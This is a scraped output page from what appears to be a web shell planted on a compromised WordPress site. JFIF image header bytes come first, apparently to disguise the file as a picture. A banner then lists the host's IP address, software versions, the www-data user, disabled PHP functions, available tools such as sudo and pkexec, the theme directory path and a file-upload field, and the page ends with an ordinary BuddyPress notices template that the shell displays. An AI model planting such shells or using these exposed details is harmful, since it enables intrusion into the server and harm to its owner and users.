????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.224.2.133 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/wp-content/themes/x/buddypress/members/single/messages/ |
Upload File : |
<?php do_action( 'bp_before_notices_loop' ); ?> <?php if ( bp_has_message_threads() ) : ?> <div class="x-pagination pagination no-ajax" id="user-pag"> <div class="pag-count" id="messages-dir-count"> <?php bp_messages_pagination_count(); ?> </div> <div class="pagination-links" id="messages-dir-pag"> <?php bp_messages_pagination(); ?> </div> </div><!-- .pagination --> <?php do_action( 'bp_after_notices_pagination' ); ?> <?php do_action( 'bp_before_notices' ); ?> <table id="message-threads" class="messages-notices"> <?php while ( bp_message_threads() ) : bp_message_thread(); ?> <tr id="notice-<?php bp_message_notice_id(); ?>" class="<?php bp_message_css_class(); ?>"> <td width="1%"></td> <td width="38%"> <strong><?php bp_message_notice_subject(); ?></strong> <?php bp_message_notice_text(); ?> </td> <td width="21%"> <?php if ( bp_messages_is_active_notice() ) : ?> <strong><?php bp_messages_is_active_notice(); ?></strong> <?php endif; ?> <span class="activity"><?php _e( 'Sent:', '__x__' ); ?> <?php bp_message_notice_post_date(); ?></span> </td> <?php do_action( 'bp_notices_list_item' ); ?> <td width="10%"> <a class="button" href="<?php bp_message_activate_deactivate_link(); ?>" class="confirm"><?php bp_message_activate_deactivate_text(); ?></a> <a class="button" href="<?php bp_message_notice_delete_link(); ?>" class="confirm" title="<?php esc_attr_e( "Delete Message", "__x__" ); ?>">x</a> </td> </tr> <?php endwhile; ?> </table><!-- #message-threads --> <?php do_action( 'bp_after_notices' ); ?> <?php else: ?> <div id="message" class="info"> <p><?php _e( 'Sorry, no notices were found.', '__x__' ); ?></p> </div> <?php endif;?> <?php do_action( 'bp_after_notices_loop' ); ?>